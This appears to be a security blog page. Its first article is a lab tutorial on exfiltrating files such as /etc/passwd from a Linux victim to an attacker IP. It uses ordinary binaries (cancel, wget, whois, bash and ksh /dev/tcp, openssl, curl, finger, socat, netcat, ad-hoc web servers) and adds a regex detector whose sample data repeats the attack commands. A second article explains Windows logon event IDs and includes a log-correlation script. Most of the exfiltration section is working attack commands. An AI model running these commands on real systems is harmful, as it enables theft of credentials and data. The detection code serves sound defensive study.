Data Exfiltration using Linux Binaries


Have you ever heard of critical data being exported somewhere else without your knowledge? Data exfiltration is a breach in which an attacker gains unauthorized access to the data on a user's system or a server and copies it out.
Table of Contents
· Introduction to
  o Data exfiltration
  o Linux Binaries
· Data exfiltration using default Linux binaries
  o /cancel
  o /wget
  o /whois
  o /bash
  o /openssl
  o /busybox
  o /nc
· Data exfiltration using apt-installed Linux binaries
  o /curl
  o /finger
  o /irb
  o /ksh
  o /php
  o /socat

Introduction to Data Exfiltration
Data exfiltration is also known as data theft or data exportation. The terms describe an attacker gaining unauthorized access to a system or network and quietly copying a user's data out of it. It can be carried out in many ways, all with the same intent of stealing data, and it usually goes undetected. In this article, we are going to learn about data exfiltration using Linux binaries.
Introduction to Linux Binaries
Binaries are files containing compiled source code. They are also called executables, since they can be run directly on the system. Here, we will use binaries that can upload or serve files to perform data exfiltration. This article is divided into two parts:
· Data exfiltration using default Linux binaries
· Data exfiltration using apt-installed Linux binaries
Now, boot the two Linux systems, Kali Linux and Ubuntu. Throughout the article one of them poses as the attacker and the other as the victim.
Data exfiltration using default Linux Binaries
/cancel
cancel is the CUPS command for cancelling print jobs. Its -u (user) option accepts an arbitrary string and -h names the print server, so the contents of a file can be smuggled out in the username field of the request to an attacker-controlled host over a TCP connection.
Victim Machine
Here the Ubuntu system is the victim machine. Pass the file to upload (via command substitution), the attacker's IP, and the remote port to cancel:
cancel -u "$(cat /etc/passwd)" -h 192.168.0.147:1234


Attacker Machine
Here Kali Linux is the attacker machine; it listens on port 1234 with Netcat:
nc -lvp 1234
You will see the contents of /etc/passwd, with all the users, listed on the attacker machine.


/wget
wget is a program that retrieves content from web servers. Its --post-file option sends a local file as the body of an HTTP POST request, which lets us push the file to the attacker machine.
Victim Machine
Here we use Ubuntu as the victim machine and send a local file with an HTTP POST request to the attacker's IP and listening port:
wget --post-file=/etc/passwd http://192.168.0.147:1234
 

Attacker Machine
Here we are using Kali Linux as the attacker machine. Netcat is used as the listener to receive the file:
nc -lvp 1234
You will see the HTTP POST headers followed by the contents of /etc/passwd, with all the users, listed on the attacker machine.


/whois
whois normally sends a query string to a WHOIS server on TCP port 43; since the query is an arbitrary string, a file's contents can be sent to the attacker machine over a TCP connection instead.
Victim Machine
Here the Ubuntu system is the victim machine. Pass the attacker's IP with -h, the remote port with -p, and the file contents as the query:
whois -h 192.168.0.147 -p 43 "$(cat /etc/passwd)"
 

Attacker Machine
Here Kali Linux is the attacker machine; it listens on port 43 with Netcat:
nc -lvp 43
You will see the contents of /etc/passwd, with all the users, listed on the attacker machine.


/bash
bash is a Unix shell and command language. It can open TCP connections by itself through its /dev/tcp/HOST/PORT pseudo-device (a bash feature, not a real device file), so a file can be sent to the attacker machine wrapped in an HTTP POST without any download tool being present.
Victim Machine
Here we have made use of the Ubuntu system as the victim machine. Build the POST request from the file contents and redirect it to the attacker's IP and port:
bash -c 'echo -e "POST / HTTP/0.9\n\n$(</etc/passwd)" > /dev/tcp/192.168.0.147/1234'
 

Attacker Machine
Here Kali Linux is the attacker machine; it listens on port 1234 with Netcat:
nc -lvp 1234
You will see the contents of /etc/passwd, with all the users, listed on the attacker machine.


/openssl
OpenSSL is a robust, full-featured toolkit for the TLS and SSL protocols. Its s_client subcommand can carry a file to the attacker machine over a TLS-encrypted TCP connection, so a network sensor sees only the TLS session, not the file contents.
Victim Machine
Here we have made use of the Ubuntu system as the victim machine. Connect to the attacker's IP and port and feed the file on standard input:
openssl s_client -quiet -connect 192.168.0.147:1234 < "/etc/passwd"


Attacker Machine
Here we are using Kali Linux as the attacker machine. Generate a self-signed certificate, then run s_server on port 1234 and write whatever the client sends into a file:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 1234 > passwd
 
To check the contents of the file, you can type;
cat passwd
 

/busybox
BusyBox is a software suite that provides many Linux utilities in a single executable. Its httpd applet turns the victim into a web server, so the attacker can pull files over HTTP instead of the victim pushing them.
Victim Machine
Here the Ubuntu system is the victim machine. Serve the files in the current directory over HTTP (-f keeps the server in the foreground, -p sets the port, -h sets the directory to serve):
busybox httpd -f -p 8080 -h .


Attacker Machine
Here we are using Kali Linux as the attacker machine. To download the file from the victim's web server (the victim is 192.168.0.196 here), type:
wget http://192.168.0.196:8080/data.txt
To read the contents of the file, type
cat data.txt


/nc
Netcat is a command-line tool for reading, writing, and redirecting data across network connections. We can use the nc binary to serve a file on a listening TCP port from which the attacker machine pulls it.
Victim Machine
Here, Kali Linux is the victim machine. Start a TCP listener that sends the file to whoever connects:
nc -lvp 5555 < jeeni.txt
 

Attacker Machine
Here, Ubuntu is the attacker machine. To download the file, connect to the victim's listener and redirect the output to a file:
nc 192.168.0.147 5555 > jeeni.txt
To read the contents of the file, type
cat jeeni.txt


Data exfiltration using apt-installed Linux binaries
/curl
curl is a command-line tool for transferring data using various network protocols. We can use the curl binary to send a file to the attacker machine in the body of an HTTP POST request. So, the first step would be to install the curl binary using apt.
Victim Machine
Here the Ubuntu system is the victim machine. Send the local file as the body of an HTTP POST request to the attacker's IP (port 80 by default). Note that -d @file strips newlines from the file, whereas --data-binary @file would send it byte for byte:
curl -X POST -d @data.txt 192.168.0.147


Attacker Machine
Here we are using Kali Linux as the attacker machine. Listen on port 80 with Netcat and write the received request to a file:
nc -lvp 80 > data.txt
To read the file, type
cat data.txt


/finger
finger is a program for looking up information about computer users on a host. The query user@host is sent as a string to TCP port 79 on the named host, so a file's contents can be placed in the user part and sent to the attacker machine. So, the first step would be to install the finger binary using apt.
Victim Machine
Here the Ubuntu system is the victim machine. Put the file contents in the user part of the query and the attacker's IP after the @:
finger "$(cat /etc/passwd)@192.168.0.147"


Attacker Machine
Here we are using Kali Linux as the attacker machine. Listen on the finger port, 79, with Netcat:
nc -lvp 79
You can see the user accounts from /etc/passwd.


/irb
irb executes Ruby expressions interactively, reading them from stdin. Ruby's WEBrick library lets us start an HTTP server from within irb that serves the current directory, so the attacker can pull files over HTTP. So, the first step would be to install the irb binary using apt.
Victim Machine
Here the Ubuntu system is the victim machine. Start irb, then start a WEBrick HTTP server on port 8888 with the current directory as its document root:
irb
require 'webrick'; WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start;


Attacker Machine
Here we are using Kali Linux as the attacker machine. To download the file, open the victim's server in the browser:
192.168.0.196:8888


/ksh
KornShell (ksh) is a shell and programming language that executes commands read from a terminal or a file. Like bash, it supports the /dev/tcp/HOST/PORT pseudo-device, so a file can be sent to the attacker machine over a plain TCP connection. So, the first step would be to install the ksh binary using apt.
Victim Machine
Here the Ubuntu system is the victim machine. Redirect the file to a TCP connection to the attacker's IP on port 1234:
ksh -c 'cat /etc/passwd > /dev/tcp/192.168.0.147/1234'


Attacker Machine
Here we are using Kali Linux as the attacker machine. Listen on port 1234 with Netcat to receive the file:
nc -lvp 1234


/php
PHP is a scripting language that is especially suited to web development. Its built-in web server (php -S) serves the current directory over HTTP, so the attacker can pull files from the victim. So, the first step would be to install the php binary using apt.
Victim Machine
Here the Ubuntu system is the victim machine. Start the built-in web server on all interfaces, port 8080:
php -S 0.0.0.0:8080


Attacker Machine
Here we are using Kali Linux as the attacker machine. Download the file from the victim's web server:
wget 192.168.0.196:8080/data.txt


/socat
socat is a utility for data transfer between two addresses. We can use the socat binary to send a file to the attacker machine over a TCP connection. So, the first step would be to install the socat binary using apt.
Victim Machine
Here the Ubuntu system is the victim machine. Send the file (-u makes the transfer unidirectional, file to socket) to the attacker's IP on port 1234:
socat -u file:/etc/passwd TCP-connect:192.168.0.147:1234


Attacker Machine
Here we are using Kali Linux as the attacker machine. Listen on port 1234 with Netcat and write the received data to a file:
nc -lvp 1234 > passwd


You can try out other Linux binaries for data exfiltration from https://gtfobins.github.io/
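From the defender's side, every transfer above shows up in process-execution telemetry (auditd execve records, EDR command lines) as a stock binary invoked with a remote host, a /dev/tcp redirect, a file-upload option, or an ad-hoc web server. The Python below is an added example, not code from the original article or from GTFOBins: it applies one regex rule per technique on this page to constructed command lines (the sample events, their PIDs and user names are all made up) and marks hits that also name a sensitive file or carry passwd-style content in their arguments. It generalizes slightly beyond the page by also matching python -m http.server as an ad-hoc server.

```python
import re
from dataclasses import dataclass

# One rule per living-off-the-land pattern: (name, regex over the command line).
RULES = [
    ("curl-upload", re.compile(r"\bcurl\b.*(?:\s-d\s*@|--data(?:-binary|-raw)?\s*@|\s-T\s|--upload-file)")),
    ("wget-post-file", re.compile(r"\bwget\b.*--post-file")),
    ("shell-dev-tcp", re.compile(r"/dev/(?:tcp|udp)/\S+")),          # bash/ksh network redirect
    ("cancel-remote-host", re.compile(r"\bcancel\b.*\s-h\s+\S+")),    # CUPS cancel aimed at a remote server
    ("whois-remote-host", re.compile(r"\bwhois\b.*\s-h\s+\S+")),
    ("finger-remote-query", re.compile(r"\bfinger\b.*\S+@\S+")),
    ("socat-tcp-connect", re.compile(r"\bsocat\b.*\btcp\d?-connect\b", re.I)),
    ("openssl-s_client", re.compile(r"\bopenssl\s+s_client\b")),
    ("nc-file-redirect", re.compile(r"\b(?:nc|ncat|netcat)\b.*[<>]\s*\S+")),
    ("adhoc-http-server", re.compile(
        r"\b(?:busybox\s+httpd|php\s+-S\b|python\d?\s+-m\s+(?:http\.server|SimpleHTTPServer))")),
]
# Sensitive paths, or passwd-style "name:x:uid:gid:" content passed as an argument.
SENSITIVE = re.compile(r"/etc/(?:passwd|shadow|sudoers)|\.ssh/|\b\w+:x:\d+:\d+:")


@dataclass
class Finding:
    pid: int
    user: str
    rules: list
    sensitive: bool
    cmdline: str


def analyse(cmdline):
    """Return (matched rule names, whether the command touches sensitive data)."""
    hits = [name for name, rx in RULES if rx.search(cmdline)]
    return hits, bool(SENSITIVE.search(cmdline))


def scan(events):
    """events: iterable of 'pid user cmdline' lines (a constructed, normalised format).
    Returns one Finding for every line matching at least one rule, in input order."""
    findings = []
    for line in events:
        pid, user, cmdline = line.split(maxsplit=2)
        hits, sensitive = analyse(cmdline)
        if hits:
            findings.append(Finding(int(pid), user, hits, sensitive, cmdline))
    return findings


def report(events):
    """Human-readable triage lines, sensitive-data hits first."""
    found = sorted(scan(events), key=lambda f: (not f.sensitive, f.pid))
    return [f"{'HIGH  ' if f.sensitive else 'MEDIUM'} pid={f.pid} user={f.user} "
            f"rules={','.join(f.rules)} :: {f.cmdline}" for f in found]


# Constructed sample telemetry mirroring the article's commands, plus benign noise.
SAMPLE_EVENTS = [
    '1201 www-data cancel -u "root:x:0:0:root:/root:/bin/bash" -h 192.168.0.147:1234',
    '1202 www-data wget --post-file=/etc/passwd http://192.168.0.147:1234',
    '1203 www-data whois -h 192.168.0.147 -p 43 "root:x:0:0:root:/root:/bin/bash"',
    "1204 www-data bash -c 'echo -e \"POST / HTTP/0.9\\n\\n$(</etc/passwd)\" > /dev/tcp/192.168.0.147/1234'",
    # the "< /etc/passwd" redirect is performed by the shell and never reaches argv,
    # so only the s_client rule fires here and the file read stays invisible
    '1205 www-data openssl s_client -quiet -connect 192.168.0.147:1234',
    '1206 www-data busybox httpd -f -p 8080 -h .',
    '1207 www-data curl -X POST -d @data.txt 192.168.0.147',
    '1208 www-data finger "root:x:0:0:root:/root:/bin/bash@192.168.0.147"',
    "1209 www-data ksh -c 'cat /etc/passwd > /dev/tcp/192.168.0.147/1234'",
    '1210 www-data socat -u file:/etc/passwd TCP-connect:192.168.0.147:1234',
    '1211 alice wget https://example.org/pub/notes.tar.gz',      # benign download
    '1212 alice whois example.com',                              # benign lookup
    "1213 bob sh -c 'nc -lvp 5555 < jeeni.txt'",                 # file served on a listener
    '1214 bob curl -s https://example.org/api/status',           # benign GET
]

if __name__ == "__main__":
    print("\n".join(report(SAMPLE_EVENTS)))
```

The rules key on argument shapes rather than on the binary name alone, because wget, curl, whois and nc are all common in legitimate use; the openssl case shows the limit of argv-only telemetry, which is why file-access auditing of /etc/shadow and similar paths belongs alongside it.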

Incident Response: Windows Account Logon and logon Events


When a user authenticates to a Windows endpoint, an Account Logon event is generated and recorded in the Security event log of the system responsible for authenticating the user.
When an account accesses a resource, a Logon event is recorded in the Security event log of the system being accessed.
As an incident responder, if you spot account logon events on a machine other than the Domain Controller, it could be a sign of local user account usage.
Local user account usage is abnormal in domain environments and can indicate a compromise.
Table of Contents
· Introduction
· Logon Events
· Account Logon Events
· Event IDs
  o Event ID 4624
  o Event ID 4625
  o Event ID 4634
  o Event ID 4647
  o Event ID 4648
  o Event ID 4672
· Kerberos Authentication Protocol
  o Event ID 4768
  o Event ID 4769
  o Event ID 4776
  o Event ID 4778
  o Event ID 4779
Introduction
A Windows system has various authentication and logon methods for establishing remote sessions between systems over a network. In this article, we will learn about the different account logon events and about authentication protocols like Kerberos.

Windows authentication methods range from a simple logon based on something the user knows, such as a password, to tokens, public key certificates, and biometrics.
An authentication protocol like Kerberos defines the rules and conventions for authenticating users, computers, and services. Authentication identifies an authorized user or service and grants it access to resources in a much more secure way.
Logon Events
Audit logon events is a policy setting that records all attempts to log on to the local computer, whether with a domain account or a local account. Audit Logon/Logoff events are generated when logon sessions are created and destroyed. These events occur on the machine that was accessed.
Account Logon
The Account Logon policy setting generates events for any kind of credential validation. These events occur on the machine that is authoritative for the credentials: for domain accounts the domain controller, for local accounts the local machine.
So, let’s see these event IDs one by one across the Windows server.
Event ID 4624
This event is generated for a successful logon. It contains the host and the name of the account involved. For remote logons, an incident responder should focus on the Network Information section of the event description for information about the remote host.
The Caller Process Name and Caller Process ID fields in the Process Information section of the event description provide more detail about the process that initiated the logon.


When a user successfully logs on to a computer, this event will be generated.


Event ID 4625
This event is created on a failed logon attempt. A high volume of these events across a network may indicate a password guessing attack. The Network Information section of the event can provide valuable information if a remote host is attempting to log on to the system.
As an incident responder, you can learn more about the reason for the failure by going through the description.


When a user has a failed login attempt on to a computer, this event will be generated.

 
Event ID 4634
When a user logs off from a system, it is recorded as Event ID 4634. If a system shows a logon with no matching logoff event, you as an incident responder should not consider that overly suspicious.



Event ID 4647
This event is triggered when user-initiated activity no longer occurs, i.e. the user initiated the logoff. It differs from event 4634, which is generated when a session no longer exists because it was terminated.
This event is generated when the user's logon is of the remote type and the logoff was performed with a standard method.



Event ID 4648
A logon was attempted using explicit credentials. This event is logged when a user uses credentials other than their own, or when a process is opened with administrator permissions through a User Account Control prompt.



Event ID 4672
When a set of sensitive privileges is assigned to a new logon session, this event is generated for that logon. It appears frequently in the Event Viewer, since a logon by the local system account also triggers it.



Kerberos Authentication Protocol
Kerberos is an authentication protocol based on tickets that allows nodes communicating over a non-secure network to prove their identity to each other in a secure manner.
So, let us understand the basics of Kerberos first, then go ahead with the Kerberos authentication protocol and proceed with the event logs.
Client: A user that requests a communication service.
Resource Server: The server hosting the service the user wants to access.
Authentication Server: Performs client authentication and issues a ticket-granting ticket (TGT) on successful authentication.
Key Distribution Centre: The database, Authentication Server and Ticket Granting Server are collectively called the Key Distribution Centre (KDC).
Ticket Granting Server: An application server that issues service tickets as a service.


Event ID 4768
On successful issuance of a TGT, this event shows that a user account was authenticated by the domain controller. The Keywords field indicates whether the authentication attempt succeeded or failed.



Event ID 4769
Once the client successfully receives a ticket-granting ticket from the KDC, it stores the TGT and sends it to the TGS together with the Service Principal Name (SPN) of the resource it wants to access; that service ticket request is what Event ID 4769 records. TGTs are valid for a limited period only.



Event ID 4776
This event is created when the computer attempts to validate an account's credentials. It contains additional information about the remote host in the event of a remote logon attempt. The Keywords field indicates whether the authentication attempt succeeded or failed.



Event ID 4778
This event is created when a session is reconnected to a Windows station. If a user reconnects with an existing Terminal Services session, or switches to an existing desktop using Fast User Switching, event 4778 is generated. This event is also triggered when a user reconnects to a virtual host.



Event ID 4779
If a user disconnects from an existing Terminal Services session, or switches away from an existing desktop using Fast User Switching, this event is generated. This event is also created when a user disconnects from a virtual host.
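The 4625/4624 guidance and the note about account logon events on non-domain-controllers translate directly into correlation rules. The Python below is an added example, not from the original article or from Microsoft: it runs over constructed Security-log records reduced to the fields the rules need (the hosts, accounts, IPs and timestamps are made up, and DOMAIN_CONTROLLERS is an assumed inventory) and flags (1) a burst of 4625 failures from one source against one host, noting whether a 4624 from that source followed, and (2) local-account use on a member server, seen either as a 4776 recorded there or as a 4624 whose TargetDomainName is the host itself.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed inventory: hosts that are authoritative for domain credentials.
DOMAIN_CONTROLLERS = {"DC01"}


def _when(e):
    return datetime.fromisoformat(e["TimeCreated"])


def password_guessing(events, threshold=5, window=timedelta(minutes=5)):
    """One finding per (host, source IP) with >= threshold 4625 events inside
    `window`; notes whether a 4624 from the same source followed the burst."""
    failures, successes = defaultdict(list), defaultdict(list)
    for e in events:
        key = (e["Computer"], e.get("IpAddress", "-"))   # 4776 records carry no IpAddress
        if e["EventID"] == 4625:
            failures[key].append(_when(e))
        elif e["EventID"] == 4624:
            successes[key].append(_when(e))
    findings = []
    for (host, src), times in failures.items():
        times.sort()
        for i in range(len(times) - threshold + 1):
            first, last = times[i], times[i + threshold - 1]
            if last - first <= window:
                followed = any(last <= s <= last + window for s in successes[(host, src)])
                findings.append({"rule": "password-guessing", "host": host, "source": src,
                                 "failures": len(times), "success_after": followed})
                break   # one finding per source is enough for triage
    return findings


def local_account_use(events):
    """On a non-DC, a 4776 means the host validated the credential against its own
    SAM, and a 4624 whose TargetDomainName is the host name is a local-account logon."""
    findings = []
    for e in events:
        host = e["Computer"]
        if host in DOMAIN_CONTROLLERS:
            continue
        local_logon = (e["EventID"] == 4624
                       and e.get("TargetDomainName", "").upper() == host.upper())
        if e["EventID"] == 4776 or local_logon:
            findings.append({"rule": "local-account-use", "host": host,
                             "event": e["EventID"], "account": e["TargetUserName"]})
    return findings


def triage(events):
    """All findings, password-guessing bursts first."""
    return password_guessing(events) + local_account_use(events)


def _logon(eid, host, user, domain, ip, ts, logon_type=3):
    return {"EventID": eid, "Computer": host, "TargetUserName": user,
            "TargetDomainName": domain, "IpAddress": ip, "LogonType": logon_type,
            "TimeCreated": ts}


# Constructed sample records (not real logs).
SAMPLE_EVENTS = [
    # six failures in 25 seconds from 10.0.0.9 against FILESRV01, then a success
    *[_logon(4625, "FILESRV01", "jsmith", "CORP", "10.0.0.9", f"2024-03-01T09:00:{s:02d}")
      for s in (1, 5, 9, 14, 20, 26)],
    _logon(4624, "FILESRV01", "jsmith", "CORP", "10.0.0.9", "2024-03-01T09:00:40"),
    # a single mistyped password on a workstation: not a burst
    _logon(4625, "WS07", "alice", "CORP", "10.0.0.23", "2024-03-01T09:03:00"),
    _logon(4624, "WS07", "alice", "CORP", "10.0.0.23", "2024-03-01T09:03:10"),
    # local SAM account used on a member server: TargetDomainName equals the host
    _logon(4624, "FILESRV01", "backup_admin", "FILESRV01", "10.0.0.31", "2024-03-01T09:10:00"),
    # 4776 on a member server: the credential was validated locally
    {"EventID": 4776, "Computer": "FILESRV01", "TargetUserName": "backup_admin",
     "Workstation": "WS07", "TimeCreated": "2024-03-01T09:10:00"},
    # the same event on the DC is the normal place for domain credentials to be validated
    {"EventID": 4776, "Computer": "DC01", "TargetUserName": "jsmith",
     "Workstation": "WS07", "TimeCreated": "2024-03-01T09:11:00"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

The threshold and window are deliberately parameters: a single mistyped password (the WS07 records) must not page anyone, while a short burst followed by a 4624 from the same address is the pattern worth a responder's time.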



You can also try out some other event IDs from below.